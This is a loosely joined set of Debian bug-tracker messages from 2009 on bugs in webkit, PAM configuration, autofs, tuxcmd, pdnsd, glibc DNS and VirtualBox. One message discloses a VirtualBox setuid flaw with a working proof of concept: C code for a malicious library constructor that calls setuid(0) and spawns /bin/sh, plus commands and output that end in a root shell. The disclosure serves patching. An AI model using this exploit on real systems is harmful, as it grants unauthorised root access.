Bug#520052: webkit: CVE-2008-4723 cross-site scripting vulnerability
On Mon, Mar 16, 2009 at 10:28:04PM -0400, Michael Gilbert wrote: package: libwebkit-1.0-1 severity: grave tags: security it has been found that webkit is vulnerable to a cross-site scripting vulnerability, see CVE-2008-4723 [1]. note that certain extensions are protected and others are not. for example, the attack does not work for files with the jpg or txt extension. however, the attack seems to work for general extensions such as odp, xls, etc (probably because webkit does not have a proper download that would appropriately handle general extensions yet). if you fix these vulnerabilities, please make sure to include the CVE id in your changelog. please contact the security team to coordinate a fix for stable and/or if you have any questions. regards, mike [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4723 This sounds very exagerated. Basically, what happens is that browsers don't care about the file extension when dealing with these, and sniff the real content. But in the end, the so-called attack could be done with an http server serving .jpeg files with a text/html mime type. Nothing new, and nothing that sounds like a real security threat. Bug#519927: default response to libpam-runtime configuration disables unix passwords
severity 519927 serious thanks On Mon, Mar 16, 2009 at 01:53:23AM -0700, Russell Senior wrote: On some Debian unstable systems, configuring libpam-runtime leads to the following question: # dpkg-reconfigure libpam-runtime Pluggable Authentication Modules (PAM) determine how authentication, authorization, and password changing are handled on the system, as well as allowing configuration of additional actions to take when starting user sessions. Some PAM module packages provide profiles that can be used to automatically adjust the behavior of all PAM-using applications on the system. Please indicate which of these behaviors you wish to enable. 1. Unix authentication 2. none of the above (Enter the items you want to select, separated by spaces.) PAM profiles to enable: Pressing enter (with an empty default) results in Unix password authentication being turned off. This happens only if: - You set the debconf priority to medium or lower. - You are using the readline frontend instead of the default dialog frontend. - You do not have libterm-readline-gnu-perl installed. To the extent that debconf doesn't inform you what the currently-selected options are, that should probably be considered a debconf bug. However, with these settings you're going to get a lot of wrong defaults if you're just hitting enter, and that's effectively user error for configuring debconf that way and subsequently hitting enter... This is unexpected and not very nice behavior. I have labelled severity as critical as it had the effect of leaving a system accessible remotely without password for several days, during which typical ssh robo-scans were able to log in freely and trivially gain root. No, it's not very nice. There are three possible courses of action here in the case that the user selects an empty set of modules. We can have a default permit policy (fail open), a default deny policy (fail closed), or we can force the user to choose one or more modules. I had avoided going with the last option because it requires additional debconf prompts that will require another round of translation; but if it's not sufficiently obvious that it's an error to answer this question with an empty set of modules, then that's what we'll need to do. -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. My sponsor suggested to me, to not restrict Architecture in debian/control, but at the moment there is no solution to have tuxcmd also working on powerpc architecture. I'm currently not able to solve this, and the Developer of tuxcmd sais that his effort to try support also powerpc architecture failed in past [1]. Any hint, how I should procede? A new version of the fpc will be released end of this week, and then tuxcmd should be retried to build whit the new fpc, but then I need some people with powerpc which could test that again [2]. David Aguilar wrote: Thanks Bernd. What should I do about the .pyc/.pyo files? I'm assuming that I shouldn't generate them and should instead let Debian generate them? Right, that's what python-support (and python-central, if you like that more) takes care of. They'll also take care of your .py files in /usr/share/packagename automatically, so if you install the modules to $(CURDIR)/debian/usr/share/packagename, everything should be fine. You need to make sure that the files in /usr/bin know about the path, though, for example by adding the path to sys.path. Unfortunately several other Python programs drop their files in public directories, I'll investigate in stgit if I find the time to do so. The reason for this is that hplip-data incorrectly ships a number of .pyc files within the package, which has been a violation of python packaging policy as long as there has been a python packaging policy. The debian/rules for some reason calls dh_pysupport for the Architecture: any packages, when hplip-data, containing the .py files, is an arch: all package. The attached patch fixes this so that the .py files are actually registered with python-support. The hplip.preinst code to remove all .pyc and .pyo files on upgrade of the *hplip* package is probably also unnecessary with this change. (Even if it's not unnecessary, it is wrong. The hplip package shouldn't be doing anything with .pyc files originating with another binary package.) -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. Bug#520095: removes the toplevel mountpoint directories and fails to start the next time
Package: autofs Version: 4.1.4+debian-2.1 Severity: grave When the automount daemon exits, it removes the top-level mountpoint directory. For example, when auto.master contains /net /etc/auto/net and the /net dir exists before startup, on shutdown corresponding automount process does right before exit (according to strace): unlink(/var/run/autofs/_net.pid) = 0 rmdir(/net) = 0 So it rmdirs the /net directory which were here before it started. And sure thing, the next time it does not start anymore, *silently*: Starting automounter: done. yet /net isn't mounted, and there are the following entries in syslog daemon.log: automount[12709]: failed to create iautofs directory /net automount[12709]: /net: mount failed! (even with that, there's no error message -- imagine someone who's trying to debug the issue and who created that directory just a few minutes ago -- there's no chance to understand the dir is gone!). The only solution for me was to do a `chattr +i /net' to stop it from removing the dir (it still tries but fails). So there are 3 bugs actually, all at once. 1) grave bug - removing the toplevel dirs -- something it sholdn't do in the first place 2) should say something when failed to mount the thing, insteas of just done.. For that to work, daemon should wait in parent process while the chile finishes initialization and report status back. Given the 1) above, it's not a wishlist anymore 3) no real error messages (errno) in syslog -- System Information: Debian Release: 5.0 APT prefers stable APT policy: (990, 'stable'), (500, 'testing'), (50, 'unstable'), (1, 'experimental') Architecture: i386 (i686) Kernel: Linux 2.6.28-i686smp (SMP w/2 CPU cores) Locale: LANG=ru_RU.UTF-8, LC_CTYPE=ru_RU.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages autofs depends on: ii libc6 2.7-18 GNU C Library: Shared libraries ii ucf 3.0016 Update Configuration File: preserv Versions of packages autofs recommends: ii module-init-tools 3.4-1tools for managing Linux kernel mo ii nfs-common 1:1.1.4-1tls NFS support files common to client autofs suggests no packages. -- no debconf information -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Moreover in some cases it even returns EINVAL instead of ENOSYS. This make userland software like glibc or coreutils unable to detect that the syscall does not exist and implement a fallback, which leads to breakage like 'touch' not working anymore. This is especially true for lenny running with a kernel from etch, and will become more true with sid with a kernel from lenny as the glibc version increases. This has been fixed in kernel 2.6.28, so kernels from etch, etchnhalf and lenny are affected. The patch series below applies for all of them. etchnhalf kernel is a different source package. Bug#514294: lurker kde4 mimelib
Hi, A while back Sune asked me to look at ripping mimelib out. I found the seperated upstream source for it and applied the same patches that kdepim uses. I have put the source package here: http://people.debian.org/~bdefreese/mimelib/ Of course it would mean maintaining another package but you should be able to build/link against it. Hope it helps. Mmm, then your cronjob is broken. You shouldn't auto-install packages from a cronjob without first configuring debconf to use the noninteractive frontend for this purpose; you will run into other problems besides this one. fixed, thanks. but ssh doesn't appear to be affected by this, still asks for a password. It asks for a password, but I believe you'll find that it accepts any value. You'll want to run 'pam-auth-update' as root to fix up your authentication config immediately, if you haven't already done so. I remember checking this with blank password and other random typed passwords and it didn't work. And yes, I ran pam-auth-update as soon I found what was going on. Quoting SpanKY vap...@gentoo.org: hardlinks on Linux preserve permission, including set*id bits, and can be created by non-root users. virtualbox attempts to perform some sanity checks on the dir the binary exists in (presumably to prevent privilege escalation), however that is done after the constructors in shared libs are run. that means any library a virtualbox binary links against is an attack vector. the constructor isnt the only attack vector ... you could also override any of the standard C library functions that virtualbox would call during its startup. like open() or stat() or ... there really isnt many workarounds available here if DT_RPATH:$ORIGIN is continued to be used. perhaps making a small dedicated partition (loopback or whatever) and storing the binaries on there because hardlinks cannot go across partitions. simple example: $ id -u 1002 $ cat test.c #include unistd.h #include sys/syscall.h __attribute__((constructor)) void awesome(void) { char *argv[] = { sh, NULL }; extern char *environ; syscall(SYS_setuid, 0); syscall(SYS_execve, /bin/sh, argv, environ); } $ gcc -Wall test.c -fPIC -shared -o libdl.so.2 -Wl,-soname,libdl.so.2 $ ls -l /opt/VirtualBox/VirtualBox -r-s--x--x 2 root vboxusers 23808 2009-01-30 01:57 /opt/VirtualBox/VirtualBox $ ln /opt/VirtualBox/VirtualBox $ ls -l VirtualBox -r-s--x--x 2 root vboxusers 23808 2009-01-30 01:57 VirtualBox $ ./VirtualBox ./VirtualBox: /home/vapier/libdl.so.2: no version information available (required by ./VirtualBox) sh-4.0# whoami root Upstream patches are available on: http://www.virtualbox.org/changeset/17171 http://www.virtualbox.org/changeset/17169 http://www.virtualbox.org/changeset/17168 Debian lenny is not affected by this problem as the binaries are not setuid 0. Bug#520133: linphone: spurious build-dependency on gnome-applets
Package: linphone Version: 3.0.0-2 Severity: serious Hello, linphone build-depends on gnome-applets, but this build-dependency (as confirmed with the GNOME maintainers) does not make any sense: with libpanel-applet2-dev (which is already in linphone’s build-dependency list) should be enough. This is particularly grave since linphone is now failing to build due to uninstallability of gnome-applets. It’d be great if you could do a quick upload doing the build-dependency. I’ve verified that linphone builds fine without gnome-applets installed. Please let me know if you need a NMU. Thanks for pursuing this. Upstream discusses the plans for future releases and dealing with SONAMEs on their development list. We'll see where they end up, there is no definite plan yet. Okay; I think it’s reasonable to wait, as long as we make sure it gets addressed at some point. Maybe we should open a separate bug report for it? So, to get the issue fixed, my current plan is as follows: 1.) Fix the build issues. 2.) Fake the SONAME change by changing the library package name. [*] Ok. 3.) Patch and build all dependant software. 4.) File bugs for all packages, including patches. 5.) NMU if no response in a reasonable time frame. Uhm, what kind of patches are needed? Has the API changed as well between 1.2 and 1.3? I do not know if this plan is reasonable and the release-team is OK with it. I will of course let them know about this before I take any action. Bug#513891: tuxcmd on powerpc

Binary for powerpc should probably get removed from the archive. severity 513891 serious Bug#513891: tuxcmd: Does not run at all Severity set to `serious' from `important' I agree with you that tuxcmd in it's current shape should not be released for powerpc architecture (but works with i386 and amd64). So serious bug will prevent whole tuxcmd to migrate to testing right (future versions uploaded) What would be the best approach on your point of view for that? Since the same version is in testing, this bug will not prevent migration of new versions to testing. The first step you should do is prevent the generation of binary packages on powerpc. There are a few ways to do that: - Restrict the arches list in the control file. This can make sense if upstream says it's not supported, and the source of the problem is this package. It does not make sense if this is a bug in fpc. - Run a test during the build process that tries to detect if it's working or not, and make it fail during the build process, if it doesn't work. - Have a list of arches that work in your rules file, and use that to decide if you continue buiding or not. You can close this bug in the package that prevents the generation of the binary package on powerpc. The next step is asking ftp-master to remove the binary package for powerpc from unstable. As long as the binary package stays it unstable, the scripts will assume something is wrong with the powerpc version and prevent migration to testing. When both those things have been done, the new version should migrate to testing. Any hint, how I should procede? A new version of the fpc will be released end of this week, and then tuxcmd should be retried to build whit the new fpc, but then I need some people with powerpc which could test that again [2]. You can either ask the buildd maintainers to schedule a binNMU to try with the new version of fpc, or upload a new version. Then you probably want to ask the submitter of this bug to try again. Bug#517975: pdnsd: package update overrides configuration
Hello, On Tue, Mar 17, 2009 at 06:50:46AM +0100, Christian Perrier wrote: Quoting Alexander Gattin (xr...@yandex.ru): P.S. Christian, what's your opinion on the issue? I should have one? :-) It would be nice if you do :). Maybe you faced similar discussions in the past? I generally trust Pierre's advice and experience on many issues, so I don't feel like interfering in your discussion which I don't have the background for...would be a good idea. Looks like either I'm missing something between the lines of the Debian Policy or the Policy is insufficient regarding this particular matter: namely, which file _is_ configuration file and which one isn't. IMHO, the current Policy supports my opinion better, and lacks ground for Pierre's one. If we want to give more freedom to Debian package maintainer, the Policy should be modified here (and Pierre will be free to put anything he likes under /usr, call it internal package file, stick do not touch! sign on it and then say Full stop). :) The whole issue is not technical, you know, I have absolutely no problem configuring/using/upgrading pdnsd, so it's just a matter of advocacy, definitions and arguments. Regarding the latter, I'm getting short of them, and without external intervention from you or other Debian developers, this discussion will lose sense. -- With best regards, xrgtn (+380501102966/+380636177128/xr...@jabber.kiev.ua) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Bug#519774: libc6: causes many programs not to be able to resolve dns addresses
* Mark Kamichoff: Hi - The problem is that the DNS server of your ISP does not conform to the RFC and only answer to the query with a void answer. It never answer to the A query, so the glibc resolver can only conclude the whole query has no answer. Just a thought, many DNS ALGs on firewalls (eg, Juniper NetScreen) will close the UDP/53 session after one packet (response, presumably) is received, and drop any subsequent response packets. This will break other clients, too. For instance, a BIND forwarder without source port randomization, who happens to have multiple queries in flight. Has it been verified that the second DNS packet actually leaves the box? I think there was word of a kernel bug leading to dropped UDP packets which might cause this. -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe.
